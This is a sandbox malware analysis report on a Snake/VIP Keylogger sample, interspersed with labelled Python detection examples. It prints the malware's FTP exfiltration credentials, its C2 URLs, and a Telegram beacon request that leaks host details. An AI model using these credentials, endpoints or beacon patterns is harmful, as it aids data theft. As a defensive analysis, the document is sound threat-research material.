Windows Analysis Report
3140, EUR.exe

Overview

General Information

Sample name: 3140, EUR.exe
Analysis ID: 1522669
MD5: 332593ae1e0ba5a06370963c37bbbceb
SHA1: 994f8e733ba1961882dcdef0c78fc305db4c1c91
SHA256: 9ca5a71321522f47140b36e5f1983cff7455dd124caa231d97df29cd654c6893
Tags: exe, SnakeKeylogger, user-lowmal3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match
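The three Sigma hits above (Base64-encoded MpPreference cmdlet, Powershell Defender Exclusion, scheduled task registered from a temp location) describe command-line shapes rather than this sample's exact commands, which the report does not print. The following is an added example, not part of the Joe Sandbox report: a small classifier that decodes PowerShell -EncodedCommand payloads (UTF-16LE, Base64) before matching, so an exclusion hidden behind encoding is still caught, and checks whether a schtasks /Create call sources its task XML or program from a temp or env-var folder. The sample command lines, the task name "ExampleTask" and the temp file name are constructed for illustration.

```python
import base64
import re

# Constructed process-creation command lines (Sysmon EID 1 / Security 4688
# style). The report lists the Sigma hits but not the literal command lines,
# so these only illustrate the shape the rules look for.
SAMPLE_EVENTS = [
    "powershell.exe -EncodedCommand " + base64.b64encode(
        'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'
        .encode("utf-16-le")).decode(),
    'schtasks.exe /Create /TN "ExampleTask" '
    '/XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmpA1B2.tmp"',
    'powershell.exe -NoProfile -Command "Get-Date"',   # benign noise
]

# -EncodedCommand and its accepted abbreviations, followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Add-/Set-MpPreference with any of the exclusion parameters.
MP_EXCLUSION = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I | re.S)
SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe)?.*\s/create\b", re.I)
# The task definition (/XML) or the program it runs (/TR).
TASK_SOURCE = re.compile(r'/(?:xml|tr)\s+"?([^"]+)"?', re.I)
TEMP_LOCATION = re.compile(
    r"%temp%|%appdata%|%localappdata%|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind powershell -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the rule names a single command line triggers (possibly none)."""
    hits = []
    decoded = decode_encoded_command(cmdline)
    if MP_EXCLUSION.search(cmdline):
        hits.append("powershell_defender_exclusion")
    if decoded and MP_EXCLUSION.search(decoded):
        # Exclusion only visible after decoding: both rules fire.
        hits.append("powershell_defender_exclusion")
        hits.append("base64_encoded_mppreference")
    if SCHTASKS_CREATE.search(cmdline):
        src = TASK_SOURCE.search(cmdline)
        if src and TEMP_LOCATION.search(src.group(1)):
            hits.append("schtasks_from_temp_location")
    return hits


def scan(events):
    """Map each event index to its hits, skipping events that trigger nothing."""
    findings = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

Decoding before matching is the point: the raw command line of the first event contains only Base64 text, so a rule that looks for "Add-MpPreference" in the command line alone misses it.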

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "humble@quicklyserv.com", "Password": "omobolajijonze12345", "FTP Server": "ftp://quicklyserv.com/"}
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Virustotal: Detection: 43% Perma Link
Source: 3140, EUR.exe ReversingLabs: Detection: 47%
Source: 3140, EUR.exe Virustotal: Detection: 43% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Joe Sandbox ML: detected
Source: 3140, EUR.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: 3140, EUR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: 3140, EUR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdb|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 4x nop then jmp 02E1F475h 8_2_02E1F2D8
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 4x nop then jmp 02E1F475h 8_2_02E1F4C4
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 4x nop then jmp 02E1FC31h 8_2_02E1F979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 056EF475h 15_2_056EF4C4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 056EF475h 15_2_056EF2D8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 056EFC31h 15_2_056EF979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F20D0Dh 15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F21697h 15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F231E0h 15_2_06F22DC8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F22C19h 15_2_06F22968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2E959h 15_2_06F2E6B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_06F20673
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2E501h 15_2_06F2E258
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2E0A9h 15_2_06F2DE00
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2F661h 15_2_06F2F3B8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2F209h 15_2_06F2EF60
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2EDB1h 15_2_06F2EB08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2D3A1h 15_2_06F2D0F8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2CF49h 15_2_06F2CCA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_06F20853
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_06F20040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2FAB9h 15_2_06F2F810
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F231E0h 15_2_06F22DB8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2DC51h 15_2_06F2D9A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2D7F9h 15_2_06F2D550
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F231E0h 15_2_06F2310E
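The "4x nop then jmp" entries above are the evidence behind the "Found inlined nop instructions" signature: runs of NOP padding followed by an unconditional jump, taken from the processes' memory (the 8_2_ and 15_2_ prefixes name the process and dump the function came from, so the addresses are runtime addresses, not file offsets). The following is an added example, not part of the report: a byte-level scanner that finds the pattern and computes the jump target the same way the report prints it. The code bytes are constructed, laid out at the report's function address 0x02E1F2D8 so that the first hit reproduces the report's "4x nop then jmp 02E1F475h".

```python
import struct

# Constructed 32-bit code placed at the report's function address 0x02E1F2D8:
# a short prologue, 4 NOPs + jmp rel32 to 0x02E1F475, then 4 NOPs + a short jmp.
BASE = 0x02E1F2D8
SAMPLE_CODE = (
    b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x33\xc0\x33\xdb\x8b\x7d\x08"  # prologue
    + b"\x90\x90\x90\x90\xe9" + struct.pack("<i", 0x02E1F475 - (BASE + 0x19))
    + b"\x90\x90\x90\x90\xeb\x05"
    + b"\xc3" * 8
)


def find_nop_jmp(code, base):
    """Scan for 4 NOPs followed by jmp rel32 (E9) or jmp rel8 (EB).

    Returns [(jmp_address, target_address)]. The target is the address of the
    next instruction plus the sign-extended displacement, which is what the
    report's "jmp ...h" value denotes. This is a raw pattern scan, not a
    disassembly, so data that happens to contain 90 90 90 90 E9 will also fire;
    confirm hits in a disassembler before treating them as code.
    """
    pad = b"\x90" * 4
    hits = []
    i = 0
    while i + 4 < len(code):
        if code[i:i + 4] == pad:
            op_at = i + 4
            op = code[op_at]
            if op == 0xE9 and op_at + 5 <= len(code):
                rel = struct.unpack_from("<i", code, op_at + 1)[0]
                hits.append((base + op_at, base + op_at + 5 + rel))
                i = op_at + 5
                continue
            if op == 0xEB and op_at + 2 <= len(code):
                rel = struct.unpack_from("<b", code, op_at + 1)[0]
                hits.append((base + op_at, base + op_at + 2 + rel))
                i = op_at + 2
                continue
        i += 1
    return hits


def describe(hits):
    """Render hits in the report's own wording, e.g. '4x nop then jmp 02E1F475h'."""
    return [f"4x nop then jmp {target:08X}h" for _jmp_addr, target in hits]


if __name__ == "__main__":
    for line in describe(find_nop_jmp(SAMPLE_CODE, BASE)):
        print(line)
```

The scan runs on the bytes of a memory dump; for a .NET sample such as this one the native code only exists after the JIT has run, which is why the report attributes the hits to process dumps rather than to the file on disk.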

Networking

Source: Network traffic Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.4:49780 -> 45.143.99.52:21
Source: global traffic TCP traffic: 45.143.99.52 ports 52160,54464,1,2,53879,21
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.4:49779 -> 45.143.99.52:53879
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org (14 requests, 5 of them with Connection: Keep-Alive)
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org (4 requests, 2 of them with Connection: Keep-Alive)
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
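The three request shapes in this section form the keylogger's check-in: a public-IP lookup against checkip.dyndns.org sent with a hard-coded IE6-era user agent, a geolocation lookup of that IP at reallyfreegeoip.org/xml/<ip>, and a Telegram Bot API sendMessage whose text carries the PC name, timestamp and country. In the captured request the bot token and chat_id are both empty (the path is /bot/sendMessage, not /bot<token>/sendMessage), so the beacon cannot have reached a chat; the 404 responses recorded later in this section are consistent with that. The following is an added example, not part of the report: a triage routine that parses such requests, URL-decodes the Telegram message into fields and flags the missing token. The requests are the report's own entries, re-expanded into raw HTTP with the CRLFs the report flattened; no bodies were recorded.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The report's "HTTP traffic detected" entries, re-expanded into raw HTTP
# request heads (the report prints them with the line breaks removed).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\r\n"
    "Host: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /xml/8.46.123.33 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\n\r\n",
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and"
    "%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B"
    "%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the"
    "%20system%20storage's%20empty.%20%5D HTTP/1.1\r\n"
    "Host: api.telegram.org\r\nConnection: Keep-Alive\r\n\r\n",
]

# Hard-coded user agent seen in the report, not the host's real browser.
STALE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
# Telegram Bot API path: /bot<token>/<method>; the token group may be empty.
TELEGRAM_BOT_PATH = re.compile(r"^/bot([^/]*)/([A-Za-z]+)$")


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def parse_beacon_text(text):
    """Turn the decoded 'key: value' lines of the Telegram message into a dict."""
    fields = {}
    for line in text.split("\r\n"):
        line = line.strip()
        if line.startswith("["):
            fields["note"] = line.strip("[] ")
        elif ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def triage_request(raw):
    """Label one request as a stage of the check-in sequence seen in the report."""
    _method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    url = urlsplit(target)
    if host == "checkip.dyndns.org":
        return {"kind": "public_ip_lookup",
                "stale_user_agent": headers.get("user-agent") == STALE_UA}
    if host == "reallyfreegeoip.org" and url.path.startswith("/xml/"):
        return {"kind": "geoip_lookup", "ip": url.path[len("/xml/"):]}
    if host == "api.telegram.org":
        m = TELEGRAM_BOT_PATH.match(url.path)
        if m:
            qs = parse_qs(url.query, keep_blank_values=True)
            return {"kind": "telegram_beacon",
                    "method": m.group(2),
                    "token_present": bool(m.group(1)),   # False for /bot/sendMessage
                    "chat_id": qs.get("chat_id", [""])[0],
                    "fields": parse_beacon_text(qs.get("text", [""])[0])}
    return {"kind": "other", "host": host, "path": url.path}


def is_checkin_sequence(results):
    """True when IP lookup, geoip lookup and Telegram beacon occur in that order."""
    order = ["public_ip_lookup", "geoip_lookup", "telegram_beacon"]
    pos = 0
    for result in results:
        if pos < len(order) and result["kind"] == order[pos]:
            pos += 1
    return pos == len(order)


if __name__ == "__main__":
    results = [triage_request(r) for r in SAMPLE_REQUESTS]
    for r in results:
        print(r)
    print("check-in sequence:", is_checkin_sequence(results))
```

Keyed on the ordered sequence rather than on any single host, the check survives a change of geolocation provider or a fresh bot token; the decoded fields are what an analyst reports as the data the sample tried to leak.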
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 45.143.99.52 45.143.99.52
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: EKSENBILISIMTR EKSENBILISIMTR
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443
Source: unknown FTP traffic detected: 45.143.99.52:21 -> 192.168.2.4:49778
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 3 of 150 allowed.
220-Local time is now 16:03. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (20 requests, 13 of them with Connection: Keep-Alive)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 times)
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: quicklyserv.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 30 Sep 2024 13:03:29 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 30 Sep 2024 13:03:41 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000319E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000338F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://quicklyserv.com
Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1802993888.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
